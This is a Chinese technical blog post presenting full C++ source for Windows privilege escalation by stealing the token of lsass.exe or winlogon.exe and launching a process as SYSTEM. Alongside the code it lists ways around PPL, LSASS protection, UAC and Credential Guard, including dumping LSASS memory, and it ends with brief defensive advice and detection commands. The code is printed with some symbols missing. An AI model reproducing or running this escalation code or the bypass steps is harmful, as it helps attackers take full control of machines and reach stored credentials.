发布时间:2026/7/12 1:57:04
Windows 进程令牌窃取实战:从 lsass.exe 获取 System 权限运行记事本(附 C++ 源码) Windows 系统权限提升技术深度解析从进程令牌操作到安全防御实践在Windows系统安全领域权限管理始终是攻防对抗的核心战场。掌握系统级权限不仅意味着对操作系统的完全控制更是安全研究人员进行漏洞分析、渗透测试的必备技能。本文将深入探讨Windows环境下通过进程令牌操作实现权限提升的技术细节提供可落地的C实现方案并分析现代系统对此类技术的防御机制。1. Windows权限体系基础与提权原理Windows操作系统采用基于令牌(Token)的权限管理体系每个进程运行时都关联一个安全令牌决定了该进程能够访问哪些系统资源。系统关键进程如lsass.exe本地安全认证子系统服务通常以SYSTEM权限运行——这是Windows中最高级别的权限甚至超过管理员账户。令牌窃取提权的核心逻辑在于获取高权限进程句柄复制其安全令牌利用复制的令牌创建新进程这种技术之所以有效是因为Windows允许具有足够权限的进程访问其他进程的令牌信息。关键在于获取SeDebugPrivilege特权该特权默认授予管理员用户允许调试其他用户空间的进程。// 获取SeDebugPrivilege的典型代码片段 HANDLE hToken; LUID luid; TOKEN_PRIVILEGES tp; OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, hToken); LookupPrivilegeValue(NULL, SE_DEBUG_NAME, luid); tp.PrivilegeCount 1; tp.Privileges[0].Luid luid; tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL);2. 实战通过LSASS进程令牌获取SYSTEM权限2.1 目标进程选择与枚举并非所有系统进程都适合作为令牌来源。理想的候选进程应满足始终以SYSTEM权限运行允许PROCESS_QUERY_INFORMATION访问系统关键性较低避免导致系统不稳定通过进程快照API枚举符合条件的进程DWORD FindSystemProcess() { PROCESSENTRY32 pe; pe.dwSize sizeof(PROCESSENTRY32); HANDLE hSnapshot CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(Process32First(hSnapshot, pe)) { do { if(_wcsicmp(pe.szExeFile, Llsass.exe) 0 || _wcsicmp(pe.szExeFile, Lwinlogon.exe) 0) { CloseHandle(hSnapshot); return pe.th32ProcessID; } } while(Process32Next(hSnapshot, pe)); } CloseHandle(hSnapshot); return 0; }2.2 令牌复制与进程创建关键技术成功获取目标进程句柄后关键步骤包括令牌复制使用DuplicateTokenEx复制主令牌进程创建CreateProcessWithTokenW允许指定令牌创建进程HANDLE hProcess OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); HANDLE hToken; OpenProcessToken(hProcess, TOKEN_DUPLICATE, hToken); HANDLE hNewToken; DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, hNewToken); STARTUPINFOW si {0}; PROCESS_INFORMATION pi {0}; si.cb sizeof(STARTUPINFOW); si.lpDesktop Lwinsta0\\default; // 指定窗口站 CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, Lnotepad.exe, 0, NULL, NULL, si, pi);注意CreateProcessAsUser需要额外的特权而CreateProcessWithTokenW在获取令牌后可直接使用这是实际开发中的重要区别。3. 完整实现代码与关键参数解析以下是完整的提权实现代码包含详细的错误处理和参数说明#include windows.h #include tlhelp32.h #include stdio.h BOOL EnableDebugPrivilege() { HANDLE hToken; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, hToken)) return FALSE; LUID luid; if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, luid)) { CloseHandle(hToken); return FALSE; } TOKEN_PRIVILEGES tp; tp.PrivilegeCount 1; tp.Privileges[0].Luid luid; tp.Privileges[0].Attributes SE_PRIVILEGE_ENABLED; if(!AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL)) { CloseHandle(hToken); return FALSE; } CloseHandle(hToken); return TRUE; } DWORD FindSystemProcess() { PROCESSENTRY32 pe; pe.dwSize sizeof(PROCESSENTRY32); HANDLE hSnapshot CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(!Process32First(hSnapshot, pe)) { CloseHandle(hSnapshot); return 0; } do { if(_wcsicmp(pe.szExeFile, Llsass.exe) 0 || _wcsicmp(pe.szExeFile, Lwinlogon.exe) 0) { CloseHandle(hSnapshot); return pe.th32ProcessID; } } while(Process32Next(hSnapshot, pe)); CloseHandle(hSnapshot); return 0; } int main() { if(!EnableDebugPrivilege()) { printf([!] Failed to enable SeDebugPrivilege\n); return 1; } DWORD pid FindSystemProcess(); if(pid 0) { printf([!] Could not find suitable system process\n); return 1; } HANDLE hProcess OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid); if(!hProcess) { printf([!] OpenProcess failed (%d)\n, GetLastError()); return 1; } HANDLE hToken; if(!OpenProcessToken(hProcess, TOKEN_DUPLICATE, hToken)) { printf([!] OpenProcessToken failed (%d)\n, GetLastError()); CloseHandle(hProcess); return 1; } HANDLE hNewToken; if(!DuplicateTokenEx(hToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, hNewToken)) { printf([!] DuplicateTokenEx failed (%d)\n, GetLastError()); CloseHandle(hToken); CloseHandle(hProcess); return 1; } STARTUPINFOW si {0}; PROCESS_INFORMATION pi {0}; si.cb sizeof(STARTUPINFOW); si.lpDesktop Lwinsta0\\default; if(!CreateProcessWithTokenW(hNewToken, LOGON_NETCREDENTIALS_ONLY, NULL, Lnotepad.exe, 0, NULL, NULL, si, pi)) { printf([!] CreateProcessWithTokenW failed (%d)\n, GetLastError()); } else { printf([] Successfully created process with SYSTEM token\n); } CloseHandle(hNewToken); CloseHandle(hToken); CloseHandle(hProcess); return 0; }4. 现代系统防御机制与绕过思路随着Windows安全机制的不断强化传统的令牌窃取技术面临多重防护防御机制原理潜在绕过方法PPL(Protected Process Light)限制对关键进程的访问利用未受保护的进程或驱动漏洞LSASS保护防止内存读取和进程注入使用合法的API调用获取令牌UAC(User Account Control)限制管理员权限滥用通过COM提升或自动提升白名单Credential Guard隔离凭据存储寻找非Credential Guard保护的令牌源实际测试中发现Windows 10 1809及更高版本默认启用LSASS保护直接打开lsass.exe进程会失败。此时可考虑以下替代方案使用MiniDumpWriteDump生成转储文件后离线提取令牌信息寻找其他未受PPL保护的系统进程如某些服务进程利用已知漏洞暂时禁用保护机制5. 安全开发实践与防御建议对于防御方建议采取以下措施防范令牌窃取攻击最小权限原则服务账户仅授予必要权限启用PPL保护关键系统进程令牌过滤通过组策略限制令牌权限监控敏感API调用如DuplicateTokenEx、CreateProcessWithTokenW等对于安全研究人员在合法授权测试时应注意# 防御性检测命令示例 Get-Process -IncludeUserName | Where-Object { $_.ProcessName -in (lsass,winlogon) -and $_.UserName -notlike *SYSTEM* } # 启用LSASS保护 reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f令牌操作技术在系统管理、安全测试等场景具有实际价值。我曾在一个企业环境中使用类似技术帮助恢复被恶意软件破坏的系统服务关键在于理解原理后的创造性应用。

相关新闻

2026/7/12 1:57:04

15分钟搞定黑苹果:OpCore-Simplify图形化配置终极指南

15分钟搞定黑苹果:OpCore-Simplify图形化配置终极指南 【免费下载链接】OpCore-Simplify A tool designed to simplify the creation of OpenCore EFI 项目地址: https://gitcode.com/GitHub_Trending/op/OpCore-Simplify 还在为复杂的黑苹果配置而烦恼吗&am…

2026/7/12 1:57:04

Eye-in-hand 与 Eye-to-hand 标定对比:3 大核心差异与 5 步选型决策指南

Eye-in-hand 与 Eye-to-hand 标定对比:3 大核心差异与 5 步选型决策指南 在工业自动化领域,机器人视觉系统的精度直接决定了整个生产流程的可靠性与效率。作为连接机械臂与视觉传感器的关键技术,手眼标定的方案选择往往成为项目初期最关键的决…

2026/7/12 3:07:09

BEV+3DGS:自动驾驶从猜距离到造世界的范式跃迁

1. 项目概述:从“猜距离”到“造世界”,这八年不是升级,是范式迁移我第一次在实车前装上双目摄像头做障碍物测距,是2016年夏天。那会儿算法跑在一块带散热片的Jetson TK1上,代码里全是手调的视差查找表和三角测量公式。…

2026/7/12 3:07:09

单臂路由 vs 三层交换:2种VLAN间通信方案性能与成本对比分析

单臂路由 vs 三层交换:VLAN间通信方案深度对比与选型指南在中小型企业网络架构设计中,VLAN间通信方案的选择往往让网络管理员陷入两难:是采用传统的单臂路由方案,还是投资更现代化的三层交换技术?这两种技术看似都能解…

2026/7/12 3:07:09

Linux内核Tasklet机制详解:中断处理的延迟执行解决方案

在Linux内核开发中,中断处理是一个关键但复杂的话题。很多开发者在处理硬件中断时都会遇到一个共同的问题:中断处理函数需要尽可能快地执行完成,但实际业务逻辑可能比较复杂,导致中断处理时间过长,影响系统响应性能。T…

2026/7/12 0:01:29

3步解锁音乐自由:ncmdumpGUI终极NCM文件解密转换指南

3步解锁音乐自由:ncmdumpGUI终极NCM文件解密转换指南 【免费下载链接】ncmdumpGUI C#版本网易云音乐ncm文件格式转换,Windows图形界面版本 项目地址: https://gitcode.com/gh_mirrors/nc/ncmdumpGUI 你是否曾在网易云音乐下载了心爱的歌曲&#…

2026/7/12 0:01:29

CANoe 19 SP3 配置 GB/T 27930-2023 A类系统:3步搭建BMS仿真测试环境

CANoe 19 SP3 配置 GB/T 27930-2023 A类系统:3步搭建BMS仿真测试环境随着新能源汽车行业的快速发展,充电通信协议的标准化和测试验证变得尤为重要。GB/T 27930-2023作为中国智能充电协议的最新版本,对充电机与电动汽车之间的通信提出了更严格…

2026/7/12 0:01:29

3步搞定RTL8852BE驱动:从零开始配置Wi-Fi 6网卡

3步搞定RTL8852BE驱动:从零开始配置Wi-Fi 6网卡 【免费下载链接】rtl8852be Realtek Linux WLAN Driver for RTL8852BE 项目地址: https://gitcode.com/gh_mirrors/rt/rtl8852be 还在为Linux系统无法识别RTL8852BE Wi-Fi 6网卡而烦恼吗?&#x1f…

2026/7/12 0:01:29

3步解锁音乐自由:ncmdumpGUI终极NCM文件解密转换指南

3步解锁音乐自由:ncmdumpGUI终极NCM文件解密转换指南 【免费下载链接】ncmdumpGUI C#版本网易云音乐ncm文件格式转换,Windows图形界面版本 项目地址: https://gitcode.com/gh_mirrors/nc/ncmdumpGUI 你是否曾在网易云音乐下载了心爱的歌曲&#…

2026/7/12 0:01:29

CANoe 19 SP3 配置 GB/T 27930-2023 A类系统:3步搭建BMS仿真测试环境

CANoe 19 SP3 配置 GB/T 27930-2023 A类系统:3步搭建BMS仿真测试环境随着新能源汽车行业的快速发展,充电通信协议的标准化和测试验证变得尤为重要。GB/T 27930-2023作为中国智能充电协议的最新版本,对充电机与电动汽车之间的通信提出了更严格…

2026/7/12 0:01:29

3步搞定RTL8852BE驱动:从零开始配置Wi-Fi 6网卡

3步搞定RTL8852BE驱动:从零开始配置Wi-Fi 6网卡 【免费下载链接】rtl8852be Realtek Linux WLAN Driver for RTL8852BE 项目地址: https://gitcode.com/gh_mirrors/rt/rtl8852be 还在为Linux系统无法识别RTL8852BE Wi-Fi 6网卡而烦恼吗?&#x1f…

2026/7/11 8:37:53

3个高效策略:快速掌握Axure中文界面配置

3个高效策略:快速掌握Axure中文界面配置 【免费下载链接】axure-cn Chinese language file for Axure RP. Axure RP 简体中文语言包。支持 Axure 11、10、9。不定期更新。 项目地址: https://gitcode.com/gh_mirrors/ax/axure-cn 还在为Axure RP的英文界面感…